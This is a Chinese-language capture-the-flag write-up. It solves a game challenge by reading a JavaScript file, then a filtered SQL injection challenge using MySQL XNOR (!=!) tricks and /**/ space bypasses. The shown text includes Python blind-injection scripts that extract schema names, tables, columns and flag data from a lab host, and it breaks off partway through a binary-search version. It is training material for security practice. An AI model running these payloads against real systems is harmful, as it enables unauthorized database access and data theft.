射击类游戏,先看一下源代码:
在源代码中,发现提示,当分数达到65以上的时候,将给予flag,同时发现了一个js文件:
查看js文件内容:
发现flag;
看到输入框中有提示,“tarnish”!输入试试:
经过测试,发现存在过滤:
注释符号均被过滤,可以使用闭合的方式,空格可以使用/**/来绕过;
这里使用的是同或方法!
同或刚好与异或相反,我们知道:
异或:相同为0,不同为1
同或:相同为1,不同为0 (在mysql数据库中,同或使用!=!来表示)
这里本地测试一下:
尝试输入tarnish'!=!(1)!=!'1 ->相当于true!=!true!=!true 最终的结果为true
返回结果如下:
再尝试结果为false的时候->tarnish'!=!(0)!=!'1 相当于true!=!false!=!true 最终的结果为false
之后便需要使用脚本进行盲注:
import requests
url = 'http://1.14.71.254:28313/'
url_head = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded"
}
url_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
content = ''
for i in range(1,100):
for s in url_str:
#payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))={})/**/!=!'1".format(i,ord(s))
#payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),{},1))={})/**/!=!'1".format(i,ord(s))
#payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))={})/**/!=!'1".format(i,ord(s))
payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))={})/**/!=!/**/'1".format(i, ord(s))
url_data = {
"username":payload
}
res = requests.post(url,headers=url_head,data=url_data)
if "string(39)" in res.text:
content+=s
print(content)
下面是二分法脚本:
import requests
url = 'http://1.14.71.254:28953/'
url_head = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded"
}
content = ''
for i in range(1,100):
min_num = 32
max_num = 126
mid_num = (min_num+max_num)//2
while(min_num